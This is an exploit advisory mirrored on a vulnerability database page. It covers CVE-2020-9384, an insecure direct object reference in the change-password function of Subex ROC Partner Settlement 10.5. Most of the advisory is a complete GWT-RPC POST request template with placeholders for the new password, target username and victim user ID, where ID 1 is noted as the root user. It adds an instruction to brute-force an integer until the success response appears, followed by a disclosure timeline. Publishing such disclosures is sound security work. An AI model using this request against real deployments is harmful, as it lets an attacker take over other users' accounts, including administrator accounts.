Vulners
Lucene search
Subex ROC Partner Settlement 10.5 Insecure Direct Object Reference
🗓️ 12 Apr 2020 00:00:00Reported by Jirawat VuthawiphatType 
packetstorm🔗 packetstormsecurity.com👁 144 Views
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | Subex ROC Partner Settlement Insecure Direct Object Reference (IDOR) Vulnerability | 15 Apr 202000:00 | – | cnvd |
 | CVE-2020-9384 | 14 Apr 202019:52 | – | cve |
 | CVE-2020-9384 | 14 Apr 202019:52 | – | cvelist |
 | CVE-2020-9384 | 14 Apr 202020:15 | – | nvd |
 | CVE-2020-9384 | 14 Apr 202020:15 | – | osv |
 | Design/Logic Flaw | 14 Apr 202020:15 | – | prion |
 | PT-2020-20625 · Subex · Subex Roc Partner Settlement | 14 Apr 202000:00 | – | ptsecurity |
 | CVE-2020-9384 | 22 May 202517:06 | – | redhatcve |
 | CVE-2020-9384 | 14 Apr 202019:52 | – | vulnrichment |
`===========================================================================================================
Subex ROC Partner Settlement 10.5 - Authenticated IDOR in change password function lead to account takeover
===========================================================================================================
# Exploit Title: Insecure Direct Object Reference (IDOR) vulnerability in change password function of Subex ROC Partner Settlement 10.5 allows remote authenticated users to account takeover via manipulation of POST parameters.
# Date: 20 February 2020
# Exploit Author: Kitchaphan Singchai (idealphase), Jirawat Vuthawiphat (Freeze)
# Vendor Homepage: https://www.subex.com/partner-settlement/
# Software Link: [download link if available]
# Version: 10.5 (and probably earlier versions)
# CVE : CVE-2020-9384
[Summary]
A change password function is vulnerable to Insecure Direct Object Reference (IDOR). Therefore, Any authenticated user can
change a victim password. and then masquerade as victim user.
[Vulnerability Details]
Authentication : authenticated user.
Page : http://ip:port/commonService
[Sample HTTP POST Request format is Google Web Toolkit (GWT)]
POST /<REDACTED_URI1>/<REDACTED_URI2>/commonService HTTP/1.1
Host: <REDACTED_IP_ADDRESS>:<REDACTED_PORT>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: /
Accept-Language: th,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: text/x-gwt-rpc; charset=utf-8
X-GWT-Permutation: C2F56A526C284847E8CB55F5C9540273
X-GWT-Module-Base: https://<REDACTED_IP_ADDRESS>:<REDACTED_PORT>/<REDACTED_URI1>/<REDACTED_URI>/
Content-Length: 326
Connection: close
Referer: https://<REDACTED_IP_ADDRESS>:<REDACTED_PORT>/<REDACTED_URI>/<REDACTED_FILENAME>.html
Cookie: JSESSIONID=0DE915A64064A2C9A7CADB7B85EB71FB; GWT_LOCALE=en_GB; A48EE5E800701A3D7942009555C67E71=1002226284; 4587BA7D7CD481833715E8495588AFBF=410786149; session-id=session-id
7|2|24|https://<REDACTED_IP_ADDRESS>:<REDACTED_PORT>/<REDACTED_URI1>/<REDACTED_URI2>/|D451683615061B43F5EB83714BAECE53|com.google.gwt.user.client.rpc.XsrfToken/4254043109|25543866D9D80B67F35B7482D162B874|com.subex.spark.web.app.client.module.options.changepassword.ChangePasswordDetailService|saveModel|com.subex.spark.web.app.client.module.options.changepassword.UserTblModel/430295178|<INSERT_NEW_PASSWORD_HERE>|java.lang.Boolean/476441737|java.lang.Integer/3438268394|<INSERT_ARBITRARY_USERNAME_HERE>|com.subex.spark.web.app.client.framework.models.EntityTblForAbstractFSModel/3643375843|UserTbl|User|com.subex.gwt.datamodel.SerializerMap/3044779994|extraArgDfnModelList|ExtraControl|java.lang.String/2004016611||forceAlphaNumericValue|N|abstractEntityTbl|UserPassword|User Password|1|2|3|4|5|6|1|7|7|8|0|9|1|10|6|11|8|12|13|14|13|543|9|0|0|-6|0|-246160|1|1|0|0|0|11|-6|0|0|0|10|3|-6|0|0|<BRUTE_FORCE_THIS_INTEGER_VALUE_START_FROM_0_UNTIL_FOUND_//OK[0,[],0,7]_IN_HTTP_RESPONSE_MESSAGE>|-3|11|-6|0|<VICTIM_USER_ID_FOR_ROOT_USER_MOST_PRIVILEGE_IN_THIS_SYSTEM_IS_1>|1|1|15|4|16|0|17|18|19|20|18|21|22|12|23|24|23|535|-6|0|-6|0|-246162|1|1|0|25543866D9D80B67F35B7482D162B874
[Step to reproduce]
<!-- Exploit Authors request to remove this part on 16 April 2020-->
[Expected successful change password in HTTP response message]
HTTP/1.1 200 OK
...
Content-Length: 14
Connection: close
//OK[0,[],0,7]
[Timeline]
2/Oct/2019 - Contacted Subex live chat and Sending details shared with associated E-mail and get first response
4/Oct/2019 - Subex told that they had an internal discussion at Subex and the product team will take care of the problem internally.
18/Nov/2019 - Waiting any update from Subex and send details about public vulnerability disclosure, Subex told that they will discuss this internally and get back to you at the earliest.
20/Feb/2020 - Sending CVE request on https://cveform.mitre.org/ and submitting exploit detail to exploit-db
25/Feb/2020 - CVE assigned as CVE-2020-9384`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Apr 2020 00:00Current
8.9High risk
Vulners AI Score8.9
EPSS0.00591